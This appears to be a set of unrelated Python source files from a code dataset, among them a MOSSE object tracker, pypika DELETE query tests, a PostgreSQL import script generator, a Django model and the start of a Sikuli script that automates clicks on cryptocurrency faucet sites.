\n_novas_entradas = np.array(resultado_ativacao).reshape(4, 3)\n_pesos_camada_2 = np.array([-0.017, -0.893, 0.148])\n\nprint('New inputs')\nprint(_novas_entradas)\nprint('-' * 30)\n\ndef soma_camada_2(entradas, pesos):\n \"\"\"\n Weighted sum of layer 2\n\n :param entradas:\n :param pesos:\n :return:\n \"\"\"\n resultado_intermediario = []\n for i in range(len(entradas)):\n x1, x2, x3 = entradas[i]\n peso_x1, peso_x2, peso_x3 = pesos\n somatorio = x1 * peso_x1 + x2 * peso_x2 + x3 * peso_x3\n resultado_intermediario.append(round(somatorio, 3))\n\n return resultado_intermediario\n\n\nprint('Layer 2 sum result')\nresultado_somas_camada_2 = soma_camada_2(_novas_entradas, _pesos_camada_2)\nprint(soma_camada_2(_novas_entradas, _pesos_camada_2))\n# There is a small difference in the second result here\nprint('-' * 30)\n\nprint('Activation result')\nresultado_ativacao = []\nfor resultado_soma in resultado_somas_camada_2:\n resultado_ativacao.append(ativacao(resultado_soma))\n\nprint(resultado_ativacao)","sub_path":"ia/aula-03/exercicio-01.py","file_name":"exercicio-01.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"565625173","text":"import re\nfrom calc_convert_list import Converter\nfrom calc_distinguish import Distinguish\nfrom calc_check_sequence_correction import Check\nfrom calc_data_base import CalcDataBase\n\n\nclass Sequence:\n\n    def enter_sequence(self, data_input, user_choice, n_terminus, c_terminus):\n\n        data_sequence = data_input\n\n        '''checks if sequence is correct'''\n        check_sequence1 = Check()\n        checking_result = check_sequence1.check_sequence(data_sequence)\n        if checking_result[0:6] == 'Please':  # a 'Please' prefix signals an error message\n            return checking_result\n        else:\n            '''mark non standard amino by adding *'''\n            mark_non_standard = Distinguish()\n            mark_data_sequence = mark_non_standard.distinguish_non_standard(\n                data_sequence)\n\n            '''Search for non standard amino - 3 characters'''\n            non_standard_amino = re.findall(\"\\\\((.*?)\\\\)\", mark_data_sequence)\n\n            '''Splits sequence by () and remove '' '''\n            splited_sequence = re.split(\"[(|)]\", mark_data_sequence)\n            for element in splited_sequence:\n                if element == '':\n                    splited_sequence.remove(element)\n\n            '''Builds list with divided standard and non standard amino'''\n            final_list = []\n            for element in splited_sequence:\n                if element not in non_standard_amino:\n                    final_list.append(self.split_sequence(element))\n                else:\n                    final_list.append(element)\n\n            '''Use converter to prepare final list'''\n            converted_list = Converter()\n            sequence_list = list(converted_list.list_converter(final_list))\n            # returns amino_calculator function and sequence_list\n            return self.amino_calculator(sequence_list, user_choice, n_terminus, c_terminus), sequence_list\n\n    def split_sequence(self, string_to_split):\n        return [char for char in string_to_split]\n\n
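    # Hedged illustration (made-up peptide string) of the splitting\n    # performed in enter_sequence() above:\n    #\n    #   re.findall('\\\\((.*?)\\\\)', 'AC(Orn)GH')  # -> ['Orn']\n    #   re.split('[(|)]', 'AC(Orn)GH')           # -> ['AC', 'Orn', 'GH']\n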
    def amino_calculator(self, sequence_list, user_choice, n_terminus, c_terminus):\n        '''add endings to sequence_list'''\n        if n_terminus != '':\n            sequence_list.append(n_terminus)\n        if c_terminus != '':\n            sequence_list.append(c_terminus)\n\n        base = CalcDataBase()\n        amino_data_base = base.data_base(user_choice)\n        mass_result = 0\n        try:\n\n            for single_amino in sequence_list:\n                mass_result += amino_data_base[single_amino]\n            result = round(mass_result, 2)\n            return result  # returns the result\n        except KeyError:\n            return \"Please be informed that the sequence is incorrect; amino acid or unusual amino acid does not exist\"\n","sub_path":"calc_sequence_calculator.py","file_name":"calc_sequence_calculator.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"38844516","text":"from glob import glob\nimport sys\nimport os\n\ntruth_dir = sys.argv[sys.argv.index('-t') + 1]\npred_dir = sys.argv[sys.argv.index('-p') + 1]\n\ntruths = glob(os.path.join(truth_dir, '*.txt'))\npreds = glob(os.path.join(pred_dir, '*.txt'))\n\ntruth_dict = dict()\nfor truth in truths:\n    filename = os.path.basename(truth)\n    truth_dict[filename] = set()\n\n    truth_lines = open(truth).readlines()\n    for line in truth_lines:\n        split = line.split()\n        f1 = int(split[0])\n        f2 = int(split[1])\n        for i in range(f1, f2 + 1):\n            truth_dict[filename].add(i)\n\ncorrect = 0\ntotal = 0\nfor pred in preds:\n    filename = os.path.basename(pred)\n    \n    if filename in truth_dict:\n        pred_lines = open(pred).readlines()\n        for line in pred_lines:\n            split = line.split()\n            f1 = int(split[0])\n            f2 = int(split[1])\n            for i in range(f1, f2 + 1):\n                if i in truth_dict[filename]:\n                    correct += 1\n                total += 1\n\nprint(correct / total)\nprint(correct, total)\n\n\n","sub_path":"speech/analysis/get_accuracy.py","file_name":"get_accuracy.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"185189607","text":"import numpy as np \nimport cv2\nimport matplotlib.pyplot as plt\nimport argparse\nimport os\nfrom utils import linear_mapping, pre_process, random_warp, _pre_training, _get_gauss_response,_get_init_ground_truth, load_images_from_folder, failOrNot, lmosse\n\n# some default params\ninitTracking = False\nix, iy = -1, -1\nw, h = 0, 0\ninteval = 30 \nlr=0.325\nsigma=100\nnum_pretrain=128\ncount = -1\nold_surface = float('inf')\nfail = False\nprev_frame = []\nkernel = np.ones((3,3), np.uint8) \n\n# main function\nif __name__ == '__main__':\n\tparse = argparse.ArgumentParser()\n\tparse.add_argument(\"-o\", \"--output_folder\", required=False, default='./', help=\"output folder\")\n\tparse.add_argument(\"-n\", \"--video_name\", required=True, help=\"video name\")\n\t#mosse\n\tparse.add_argument('--lr', type=float, default=0.125, help='the learning rate')\n\tparse.add_argument('--sigma', type=float, default=100, help='the sigma')\n\tparse.add_argument('--num_pretrain', type=int, default=128, help='the number of pretrain')\n\tparse.add_argument('--rotate', action='store_true', help='if rotate image during pre-training.')\n\tparse.add_argument(\"-sv\",'--svideo', default = False, help='save the output as a video')\n\tparse.add_argument(\"-sf\",'--sframe', default = False, help='save result frames')\n\n\t# to complete \n\targs = vars(parse.parse_args())\n\toutput_folder = args['output_folder']\n\tv_name = args['video_name']\n\tvideo_name = v_name.split('.')[0]\n\tlr= args['lr']\n\tsigma= args['sigma']\n\tnum_pretrain= args['num_pretrain']\n\tsvideo = args['svideo']\n\tsframe = args['sframe']\n\n\t# create paths\n\tout_path = './'+output_folder+'/'\n\tif not os.path.exists(out_path):\n\t\tos.mkdir(out_path)\n\t# center position output file\n\tmosse_txt_name = out_path +video_name + \"_centerPos_mosse.txt\"\n\tfm = open(mosse_txt_name,'w')\t\n\n\t# load shadow masks\n\tmask_path = './'+video_name+'_mask/'\n\tmasks = load_images_from_folder(mask_path)\n\n\t# begin the algorithm\n\tcap = cv2.VideoCapture(v_name)\n\n\t# get ground truth box position\n\tf = 
open(video_name+\".txt\",\"r\")\n\tline = f.readline().split(',')\n\tix = int(line[0])\n\tiy = int(line[1])\n\tw = int(line[2])\n\th = int(line[3])\n\tf.close()\n\n\tinitTracking = True\n\n\twhile(cap.isOpened()):\n\t\tcount += 1\n\n\t\tret, frame = cap.read()\n\t\tif not ret:\n\t\t\tbreak\n\n\t\t# get the image of the first frame (read as gray scale image)\n\t\tframe_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\t\tif(initTracking):\n\t\t\t# create the video \n\t\t\tif svideo:\n\t\t\t\tfourcc = cv2.VideoWriter_fourcc(*'mp4v') # Be sure to use lower case\n\t\t\t\ts= './'+output_folder+'/'+video_name.split('.')[0]+'_result'+\".mp4\"\n\t\t\t\tout = cv2.VideoWriter(s, fourcc, 20.0, (frame.shape[1], frame.shape[0]))\n\n\t\t\t# initialise mosse\n\t\t\tinit_gt = (ix,iy,w,h)\n\t\t\tinit_gt = np.array(init_gt).astype(np.int64)\n\t\t\t# start to draw the gaussian response\n\t\t\tresponse_map = _get_gauss_response(args, frame_gray, init_gt)\n\t\t\t# start to create the training set \n\t\t\t# get the goa\n\t\t\tg = response_map[init_gt[1]:init_gt[1]+init_gt[3], init_gt[0]:init_gt[0]+init_gt[2]]\n\t\t\tfi = frame_gray[init_gt[1]:init_gt[1]+init_gt[3], init_gt[0]:init_gt[0]+init_gt[2]]\n\t\t\tG = np.fft.fft2(g)\n\n\t\t\t# pre-training\n\t\t\tAi, Bi = _pre_training(args,fi, G)# Ai:corr of G and fi Bi:spectrum of fi\n\t\t\t# first frame\n\t\t\tAi = lr * Ai\n\t\t\tBi = lr * Bi\n\t\t\tpos = init_gt.copy()\n\t\t\tclip_pos = np.array([pos[0], pos[1], pos[0]+pos[2], pos[1]+pos[3]]).astype(np.int64)\n\t\t\tinitTracking = False\n\n\t\t\t# prepare for Lmosse\n\t\t\tprev_frame = frame_gray.copy()\n\t\t\t# prepare for original mosse response\n\t\t\tmosse_fi = fi.copy()\n\t\t\tmosse_Ai = Ai.copy()\n\t\t\tmosse_Bi = Bi.copy()\n\t\t\tmosse_clip_pos = clip_pos.copy()\n\t\t\tmosse_pos = pos.copy()\n\t\telse:\n\t\t\t#start tracking\t\n\t\t\tframe_gray = frame_gray.astype(np.float32)\n\t\t\t#filter noise\n\t\t\tmask_filtered = cv2.dilate(cv2.erode(masks[count], kernel, iterations=1), kernel, iterations=1)\n\t\t\tfail, old_surface = failOrNot(old_surface, mask_filtered, pos)\n\n\t\t\tif fail: \n\n\t\t\t\tlpos, lregion = lmosse(args,pos,prev_frame,frame_gray,mask_filtered)\n\n\t\t\t\t# draw\n\t\t\t\tcv2.rectangle(frame, (lpos[0], lpos[1]), (lpos[0]+lpos[2], lpos[1]+lpos[3]), (0, 255, 255), 2) # yello\n\t\t\t\tcv2.circle(frame,(int(lpos[0]+lpos[2]/2),int(lpos[1]+lpos[3]/2)), 3, (0,0,255), -1) # red\n\t\t\t\tcv2.rectangle(frame, (lregion[0], lregion[1]), (lregion[0]+lregion[2], lregion[1]+lregion[3]), (255, 255, 255), 2) # white\n\n\t\t\t\t# write down the bounding box location\n\t\t\t\tfm.write(str(lpos))\n\t\t\t\tfm.write('\\n')\n\n\t\t\telse: \n\t\t\t\t# mosse\n\t\t\t\tHi = Ai / Bi\n\t\t\t\t# subWindow\n\t\t\t\tfi = frame_gray[clip_pos[1]:clip_pos[3], clip_pos[0]:clip_pos[2]]\n\t\t\t\t# keep win size unchanged\n\t\t\t\tfi = pre_process(cv2.resize(fi, (init_gt[2], init_gt[3])))\n\t\t\t\tGi = Hi * np.fft.fft2(fi) \n\t\t\t\tgi = linear_mapping(np.fft.ifft2(Gi))\n\t\t\t\t# find the max pos\n\t\t\t\tmax_value = np.max(gi)\n\t\t\t\tmax_pos = np.where(gi == max_value)\n\t\t\t\tdy = int(np.mean(max_pos[0]) - gi.shape[0] / 2)\n\t\t\t\tdx = int(np.mean(max_pos[1]) - gi.shape[1] / 2)\n\t\t\t\t# update the position\n\t\t\t\tpos[0] = pos[0] + dx \n\t\t\t\tpos[1] = pos[1] + dy\n\t\t\t\t# trying to get the clipped position [xmin, ymin, xmax, ymax]\n\t\t\t\tclip_pos[0] = np.clip(pos[0], 0, frame.shape[1])\n\t\t\t\tclip_pos[1] = np.clip(pos[1], 0, frame.shape[0])\n\t\t\t\tclip_pos[2] = np.clip(pos[0]+pos[2], 0, 
frame.shape[1])\n\t\t\t\tclip_pos[3] = np.clip(pos[1]+pos[3], 0, frame.shape[0])\n\t\t\t\tclip_pos = clip_pos.astype(np.int64)\n\t\t\t\t# get the next fi using the new bounding box\n\t\t\t\tfi = frame_gray[clip_pos[1]:clip_pos[3], clip_pos[0]:clip_pos[2]]\n\t\t\t\tfi = pre_process(cv2.resize(fi, (init_gt[2], init_gt[3])))\n\t\t\t\t# update\n\t\t\t\tAi = lr * (G * np.conjugate(np.fft.fft2(fi))) + (1 - lr) * Ai\n\t\t\t\tBi = lr * (np.fft.fft2(fi) * np.conjugate(np.fft.fft2(fi))) + (1 - lr) * Bi\n\t\t\t\t# green bounding box when original mosse succeeds\n\t\t\t\tcv2.rectangle(frame, (pos[0], pos[1]), (pos[0]+pos[2], pos[1]+pos[3]), (0, 255, 255), 2) \n\t\t\t\t# write down the bounding box location\n\t\t\t\tfm.write(str(pos))\n\t\t\t\tfm.write('\\n')\n\n\t\t\tprev_frame = frame_gray.copy()\n\n\n\t\t\t#--------start ORIGINAL MOSSE RESPONSE--------\n\n\t\t\tmosse_Hi = mosse_Ai / mosse_Bi\n\t\t\tmosse_fi = frame_gray[mosse_clip_pos[1]:mosse_clip_pos[3], mosse_clip_pos[0]:mosse_clip_pos[2]]\n\t\t\tmosse_fi = pre_process(cv2.resize(mosse_fi, (init_gt[2], init_gt[3])))\n\t\t\tmosse_Gi = mosse_Hi * np.fft.fft2(mosse_fi)\n\t\t\tmosse_gi = linear_mapping(np.fft.ifft2(mosse_Gi))\n\t\t\t# find the max pos...\n\t\t\tmosse_max_value = np.max(mosse_gi)\n\t\t\tmosse_max_pos = np.where(mosse_gi == mosse_max_value)\n\t\t\tmosse_dy = int(np.mean(mosse_max_pos[0]) - mosse_gi.shape[0] / 2)\n\t\t\tmosse_dx = int(np.mean(mosse_max_pos[1]) - mosse_gi.shape[1] / 2)\n\t\t\t# update the position...\n\t\t\tmosse_pos[0] = mosse_pos[0] + mosse_dx\n\t\t\tmosse_pos[1] = mosse_pos[1] + mosse_dy\n\t\t\t# trying to get the clipped position [xmin, ymin, xmax, ymax]\n\t\t\tmosse_clip_pos[0] = np.clip(mosse_pos[0], 0, frame.shape[1])\n\t\t\tmosse_clip_pos[1] = np.clip(mosse_pos[1], 0, frame.shape[0])\n\t\t\tmosse_clip_pos[2] = np.clip(mosse_pos[0]+mosse_pos[2], 0, frame.shape[1])\n\t\t\tmosse_clip_pos[3] = np.clip(mosse_pos[1]+mosse_pos[3], 0, frame.shape[0])\n\t\t\tmosse_clip_pos = mosse_clip_pos.astype(np.int64)\n\t\t\t# get the current fi..\n\t\t\tmosse_fi = frame_gray[mosse_clip_pos[1]:mosse_clip_pos[3], mosse_clip_pos[0]:mosse_clip_pos[2]]\n\t\t\tmosse_fi = pre_process(cv2.resize(mosse_fi, (init_gt[2], init_gt[3])))\n\t\t\t# online update...\n\t\t\tmosse_Ai = lr * (G * np.conjugate(np.fft.fft2(mosse_fi))) + (1 - lr) * mosse_Ai\n\t\t\tmosse_Bi = lr * (np.fft.fft2(mosse_fi) * np.conjugate(np.fft.fft2(mosse_fi))) + (1 - lr) * mosse_Bi\n\t\t\t# visualize the tracking process...\n\t\t\tcv2.rectangle(frame, (mosse_pos[0], mosse_pos[1]), (mosse_pos[0]+mosse_pos[2], mosse_pos[1]+mosse_pos[3]), (255, 0, 0), 2)\n\n\t\t\t#--------end ORIGINAL MOSSE RESPONSE--------\n\n\n\t\t\t# put frame number\n\t\t\tcv2.putText(frame, 'Frame number: '+str(count), (8,20), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0,255,255), 2) # yellow text\n\t\t\tcv2.imshow('Tracking', frame)\n\t\t\t# write the txt file of the center position of the bounding box of each frame while tracking\n\n\t\t\t# if record, save the frames\n\t\t\tif svideo: \n\t\t\t\tout.write(frame) \n\n\t\t\t# save frames with bounding box\n\t\t\tif sframe :\n\t\t\t\ts = \"{0:0>3}\".format(count)\n\t\t\t\tpath_box = out_path + '/'+video_name.split('.')[0]+'_framesWithBox/'\n\t\t\t\tif not os.path.exists(path_box):\n\t\t\t\t\tos.mkdir(path_box)\n\t\t\t\tcv2.imwrite(path_box +s+ '_box.png', frame)\n\n\t\tc = cv2.waitKey(inteval) & 0xFF\n\t\tif c==27 or c==ord('q'):\n\t\t\tbreak\n\n\n\n\n\tcap.release()\n\tif 
svideo:\n\t\tout.release()\n\tfm.close()\n\tcv2.destroyAllWindows()","sub_path":"codes/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"84577728","text":"# coding: utf-8\nimport unittest\n\nfrom pypika import Table, Query, PostgreSQLQuery\n\n__author__ = \"Timothy Heys\"\n__email__ = \"theys@kayak.com\"\n\n\nclass DeleteTests(unittest.TestCase):\n table_abc = Table('abc')\n\n def test_omit_where(self):\n q = Query.from_('abc').delete()\n\n self.assertEqual('DELETE FROM \"abc\"', str(q))\n\n def test_omit_where__table_schema(self):\n q = Query.from_(Table('abc', 'schema1')).delete()\n\n self.assertEqual('DELETE FROM \"schema1\".\"abc\"', str(q))\n\n def test_where_field_equals(self):\n q1 = Query.from_(self.table_abc).where(self.table_abc.foo == self.table_abc.bar).delete()\n q2 = Query.from_(self.table_abc).where(self.table_abc.foo.eq(self.table_abc.bar)).delete()\n\n self.assertEqual('DELETE FROM \"abc\" WHERE \"foo\"=\"bar\"', str(q1))\n self.assertEqual('DELETE FROM \"abc\" WHERE \"foo\"=\"bar\"', str(q2))\n\n\nclass PostgresDeleteTests(unittest.TestCase):\n table_abc = Table('abc')\n\n def test_delete_returning(self):\n q1 = PostgreSQLQuery.from_(self.table_abc).where(\n self.table_abc.foo == self.table_abc.bar\n ).delete().returning(self.table_abc.id)\n\n self.assertEqual('DELETE FROM \"abc\" WHERE \"foo\"=\"bar\" RETURNING id', str(q1))\n\n def test_delete_returning_str(self):\n q1 = PostgreSQLQuery.from_(self.table_abc).where(\n self.table_abc.foo == self.table_abc.bar\n ).delete().returning('id')\n\n self.assertEqual('DELETE FROM \"abc\" WHERE \"foo\"=\"bar\" RETURNING id', str(q1))\n","sub_path":"pypika/tests/test_deletes.py","file_name":"test_deletes.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"331107211","text":"import FWCore.ParameterSet.Config as cms\n\ncleaningParameters = cms.PSet(\n\n vertexLabel = cms.InputTag(\"offlinePrimaryVertices\"),\n gtLabel = cms.InputTag(\"gtDigis\"),\n\n HLT_PhysDec = cms.string(\"HLT_PhysicsDeclared\"),\n \n trigSelection = cms.PSet(\n andOr = cms.bool( False ),\n #dbLabel = cms.string( 'jetmet_trigsel' ), # will be discussed below (DB)\n #dcsInputTag = cms.InputTag( \"scalersRawToDigi\" ),\n #dcsPartitions = cms.vint32( 24, 25, 26, 27 ),\n #andOrDcs = cms.bool( False ),\n #errorReplyDcs = cms.bool( False ),\n #gtInputTag = cms.InputTag( \"gtDigis\" ),\n #gtDBKey = cms.string( 'jetmet_gtsel' ),\n #gtStatusBits = cms.vstring( 'PhysDecl' ), \n #andOrGt = cms.bool( False ),\n #errorReplyGt = cms.bool( False ),\n #l1DBKey = cms.string( 'jetmet_l1sel' ),\n #l1Algorithms = cms.vstring( 'L1Tech_BPTX_plus_AND_minus.v0 AND ( L1Tech_BSC_minBias_threshold1.v0 OR L1Tech_BSC_minBias_threshold2.v0 ) AND NOT ( L1Tech_BSC_halo_beam2_inner.v0 OR L1Tech_BSC_halo_beam2_outer.v0 OR L1Tech_BSC_halo_beam1_inner.v0 OR L1Tech_BSC_halo_beam1_outer.v0 )' ), \n #andOrL1 = cms.bool( False ),\n #errorReplyL1 = cms.bool( False ),\n hltInputTag = cms.InputTag( \"TriggerResults::HLT\" ),\n hltDBKey = cms.string( 'jetmet_hltsel' ),\n hltPaths = cms.vstring( '' ), \n andOrHlt = cms.bool( False ),\n errorReplyHlt = cms.bool( False ),\n ),\n techTrigsAND = cms.vuint32(),\n techTrigsOR = cms.vuint32(),\n techTrigsNOT = cms.vuint32(),\n \n #Turn on extra checks\n doPrimaryVertexCheck = cms.bool(True),\n doHLTPhysicsOn = cms.bool(False),\n \n #Vertex 
cleanup parameters\n nvtx_min = cms.int32(1), \n nvtxtrks_min = cms.int32(0), #not used by default\n vtxndof_min = cms.int32(4),\n vtxchi2_max = cms.double(9999), #not used by default\n vtxz_max = cms.double(24.0),\n \n #Switch on tight filters for BeamHalo, JetID, HCALnoise\n tightBHFiltering = cms.bool(False),\n tightJetIDFiltering = cms.int32(-1), #-1 off, 0 minimal, 1 loose, 2 tight\n)\n","sub_path":"DQMOffline/JetMET/python/jetMETDQMCleanup_cff.py","file_name":"jetMETDQMCleanup_cff.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"279662616","text":"#formula for detecting speaker: 29 spaces + capital letter\nimport re\nimport string\ncaps_exclusions = ['OK']\nspeaker_pattern = re.compile(\"^\\s{29}[A-Z\\s]+$\")\n\nclass Line:\n def __init__(self, speaker, words):\n self.speaker = speaker\n self.words = words\n\nfile = './Seinfeld Scripts/S01E01.txt'\nwith open(file) as f:\n script = f.read()\nlines = script.split('\\n')\n# print(lines)\nfor line in lines:\n if speaker_pattern.match(line):\n print(speaker_pattern.match(line))\n # print(line)\n# # get rid of everything inside () and []\n# script = re.sub(r'\\([^)]*\\)', ' ', script)\n# script = re.sub(r'\\[[^)]*\\]', ' ', script)\n#\n# # replace all punctuation besides ' with whitespace\n# punc = '!\"#$%&()*+,-./:;<=>?@[\\\\]^_`{|}~\\n'\n# script = script.translate(str.maketrans(punc, ' '*len(punc)))\n#\n# # split into words\n# words = script.split()\n#\n# # print(words)\n#\n# data = []\n# speaker = ''\n# speech = []\n# for word in words:\n# if word.isupper() and len(word) > 1 and word not in caps_exclusions:\n# if len(speech) > 0:\n# data.append(Line(speaker,speech))\n# speech = []\n# speaker = word.lower()\n# else:\n# speaker += word.lower()\n# else:\n# speech.append(word.lower())\n# data.append(Line(speaker,speech))\n# return data\n#\n# if __name__ == \"__main__\":\n# data = get_lines('./Seinfeld Scripts/S01E01.txt')\n# class Speaker:\n# def __init__(self,name):\n# self.name = name\n# self.count = 1\n# speakers = []\n# for line in data:\n# found = False\n# for speaker in speakers:\n# if speaker.name == line.speaker:\n# speaker.count += 1\n# found = True\n# continue\n# if found:\n# continue\n# else:\n# speakers.append(Speaker(line.speaker))\n#\n# for speaker in speakers:\n# print(speaker.name,':',speaker.count)\n","sub_path":"regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"111714068","text":"import os\nimport unittest\nfrom supervised.utils.learning_curves import LearningCurves\n\n\nclass LearningCurvesTest(unittest.TestCase):\n def test_plot_close(self):\n \"\"\"\n Test if we close plots. 
This avoids the following warning:\n        RuntimeWarning: More than 20 figures have been opened.\n        Figures created through the pyplot interface (`matplotlib.pyplot.figure`)\n        are retained until explicitly closed and may consume too much memory.\n        \"\"\"\n        for _ in range(\n            1\n        ):  # you can increase the range; I keep it low to keep the tests fast\n            LearningCurves.plot_for_ensemble([3, 2, 1], \"random_metrics\", \".\")\n\n        os.remove(LearningCurves.output_file_name)\n","sub_path":"tests/tests_utils/test_learning_curves.py","file_name":"test_learning_curves.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"113164143","text":"import os\n\nimport analystApi.api_basic\nfrom analystApi.api_basic import immobrain_search_query\n\n\ndef write_to_file(output_filename, columns, values_to_add):\n    (basename, fileext) = os.path.splitext(output_filename)\n    tablename = os.path.basename(basename)\n    lines = construct_file_content(tablename, output_filename, columns, values_to_add)\n    with open(basename + '.psql', 'w') as psql_file:\n        psql_file.writelines(lines)\n\n\ndef construct_file_content(tablename, filename, columns, values_to_add):\n    column_lines = construct_column_definitions(columns, values_to_add)\n    lines = f\"\"\"\npsql -c 'DROP TABLE IF EXISTS {tablename};'\n\npsql -c 'CREATE TABLE {tablename}\n(\n{column_lines}\n)'\n\n# Read in the CSV..\npsql -c \"\\\\copy {tablename} from {filename} delimiter ',' csv header;\"\n\n# Enrich with georeferences...\npsql -c \"INSERT INTO georef SELECT id,adresse,\n    (query::json->'peripherySpatialFilter'->'coordinate'->'lat')::text::numeric oadr_koord_lat_epsg4326,\n    (query::json->'peripherySpatialFilter'->'coordinate'->'lon')::text::numeric oadr_koord_lon_epsg4326 \n    FROM {tablename} WHERE precision='HOUSE'\n    ON CONFLICT DO NOTHING\"\n    \n\"\"\"\n    return lines\n\n\ndef construct_column_definitions(columns, values_to_add):\n    if not analystApi.api_basic.column_documentation:\n        immobrain_search_query.load_variable_documentation()\n\n    # lowercase copy of columns\n    cols = [x.lower() for x in columns]\n\n    col_id = 'id'\n    basic_cols = {\n        col_id: 'text NOT NULL',\n        'adresse': 'text NOT NULL',\n        'adresse::distance': 'numeric',\n        'adresse::mincount': 'integer',\n        'adresse::maxdistance': 'integer',\n        'segment': 'text',\n    }\n\n    if not contains(col_id, cols):\n        raise Exception(f'Must contain {col_id} column')\n\n    lines = []\n\n    # Handle all columns\n    while cols:\n        col: str = cols.pop(0)  # Remove first element\n        if col in [k.lower() for k in basic_cols]:\n            for col_name, col_type in basic_cols.items():\n                if col == col_name.lower():\n                    append_col(lines, col_name, col_type)\n                    break\n        else:\n            col_filter = immobrain_search_query.get_filter_for_column(col)\n            if col_filter is None:\n                col_type = 'text'\n            else:\n                if col.endswith('includeunknown'):\n                    col_type = 'boolean'\n                else:\n                    col_type = col_filter.get_sql_type()\n\n            append_col(lines, col, col_type)\n\n    lines.append('')\n    lines.append('results_start_here text,')\n    lines.append('')\n    lines.append('queryid bigint,')\n    lines.append('distance_used numeric,')\n    lines.append('precision text,')\n    lines.append('query json,')\n    lines.append('')\n\n    for v in values_to_add:\n        lines.append(f'\"{v}\" numeric,')\n\n    lines.append('')\n    lines.append(f'PRIMARY KEY (\"{col_id}\")')\n\n    lines_string = '\\n'.join([f'    {line}' for line in lines])\n    # join the definitions with indentation\n    return lines_string\n\n\ndef append_col(lines, name, col_type):\n    lines.append(f'\"{name}\" {col_type},')\n\n\ndef 
append_col_and_remove_if_exists(lines, name, col_type, columns_lowercase):\n if contains(name, columns_lowercase):\n lines.append(f'\"{name}\" {col_type},')\n remove(name, columns_lowercase)\n\n\ndef contains(needle, haystack_lowercase):\n return needle.lower() in haystack_lowercase\n\n\ndef remove(needle, haystack_lowercase):\n haystack_lowercase.remove(needle.lower())\n","sub_path":"Python/analystApi/psql_writer.py","file_name":"psql_writer.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"295863596","text":"from Indigo7.models import IBT\nfrom django.db import models\nfrom Addresses.models import Address, Addresstypes\n\nclass Addresses_linkManager(models.Manager):\n\n def create_adress_from_customer_and_type(self, customer, adressid, adresstypeno):\n address_rec, addresstype = self.get_adress_from_customer_and_type(\n customer, adresstypeno)\n address_rec.pk=None\n address_rec.masterdata = False\n address_rec.addressid = address_rec.addressid + ' ' + addresstype.addresstype + ' ' + str(adressid) \n address_rec.save() \n return address_rec\n\n def get_adress_from_customer_and_type(self,customer, adresstypeno):\n addresstype = Addresstypes.objects.get(adresstypeno=adresstypeno) \n address_link, created = Addresses_link.objects.get_or_create(customer=customer, addresstype=addresstype)\n if created is True:\n address, created = Address.objects.get_or_create(addressid=customer.customer)\n address_link.address = address\n address_link.save() \n \n return Address.objects.get(id= address_link.address.id), addresstype\t\n\n\n\nclass Addresses_link(IBT):\n\n addresstype = models.ForeignKey('Addresses.Addresstypes',null=True) \n address = models.ForeignKey('Addresses.Address', null=True) \n customer = models.ForeignKey('Customer', null=True, related_name='+') \n\n objects = Addresses_linkManager()\n\n def __unicode__(self): \n return u'%s %s %s' % (self.addresstype, self.address.addressid, self.customer.name)\n\n class Meta:\n ordering = ['addresstype'] \n app_label = 'Customers'","sub_path":"Customers/models/address_link.py","file_name":"address_link.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"393188694","text":"# This Python file uses the following encoding: utf-8\nimport random\nimport math\nfrom sikuli import *\n# ************** Settings ****************************\n\nSettings.DelayAfterDrag = 0.2\nSettings.DelayBeforeDrag = 0.2\nSettings.MoveMouseDelay = 0\n\nversion = 0.12\nsubstract = 1\n\n# ************** Handlers ****************************\nhotKeyX = False # global to communicate with main loop\ndef xHandler(event):\n global hotKeyX\n hotKeyX = True\nEnv.addHotkey(\"x\", KeyModifier.CTRL + KeyModifier.SHIFT, xHandler)\n\n# ************** Regions ****************************\naddressRegion = Region(Region(16,38,1878,127))\nregionResult = Region(Region(315,179,1270,852))\nchattingRegion = Region(Region(57,990,346,31))\n\n# ************** End initialization ****************************\n\n# 1. freebitco.in \n# 2. 
freedoge.co.in\ndef showROI(faucet=\"freebitco.in\"):\n    global workingOnFaucet\n    global gambling\n    gambling = False\n    workingOnFaucet = faucet\n    isStarted = True\n    if exists(\"1524773343945.png\"):\n        gambling = True\n        title = Region(Region(4,113,1916,912))\n        title.highlight(1)\n\n    if exists(\"1523959349312.png\"):\n        popup(str(getBalancePD()))\n    try:\n        if faucet == \"freebitco.in\":\n            title = addressRegion.exists(\"1523401446432.png\")\n            exists(Pattern(\"1523137491957.png\").similar(0.57)).click(Pattern(\"1523137491957.png\").similar(0.55).targetOffset(49,-1))\n            getBetField()\n        else:\n            title = addressRegion.exists(Pattern(\"1521896762577.png\").similar(0.49))\n            exists(Pattern(\"1523137491957.png\").similar(0.57)).click(Pattern(\"1523137491957.png\").similar(0.55).targetOffset(49,-1))\n            getBetField()\n    except AttributeError:\n        title = addressRegion.exists(Pattern(\"1521302065814.png\").similar(0.53))\n    try:\n        ROI = Region(title.x, title.y, title.w + 1000, title.w + 1500)\n        ROI.highlight(1)\n    except:\n        pass\n    \n\ndef stopApp():\n    popup(\"Processing Shift+Ctrl+X key: stopping\")\n    